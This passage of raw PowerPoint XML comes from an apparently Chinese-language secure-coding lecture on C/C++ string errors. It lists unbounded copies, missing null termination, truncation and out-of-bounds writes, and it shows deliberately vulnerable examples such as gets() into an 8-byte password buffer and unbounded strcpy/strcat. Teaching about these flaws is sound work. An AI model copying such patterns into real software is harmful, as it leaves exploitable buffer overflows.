              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>basic_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>类模版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>实例化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>std</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>::string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>相对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格的字符串，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>basic_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>更不容易出现安全漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格的字符串仍然是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>程序中常见的数据类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>程序中不可避免地会用到多种字符串类型，除了一些极少数的情况：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串字面量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>不需要与现有的接受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格字符串的函数库交互，或者只使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格的字符串库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8800" dirty="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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="714781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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>常见的字符串操作错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1902618"/>
            <a:ext cx="7772400" cy="4341019"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>中，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格的字符串编程是很容易产生错误的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>最常见的错误有</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、无界字符串复制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、空结尾错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、截断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、差－错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、数组写入越界</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、不恰当的数据处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3908136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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、无界字符串复制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1988840"/>
            <a:ext cx="8229600" cy="3744416"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>无界字符串复制发生于从一个无界数据源复制数据到一个定长的字符数组时</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> main(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2.   char Password[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3.   puts("Enter 8 character password:");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>4.   gets(Password); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>          ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>5. }</a:t>
            </a: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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2133858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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>复制和连接字符串「源无界导致」</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719263"/>
            <a:ext cx="8229600" cy="4178300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>下面代码复制和连接字符串也容易出现错误，因为标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>函数执行的都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>无界复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
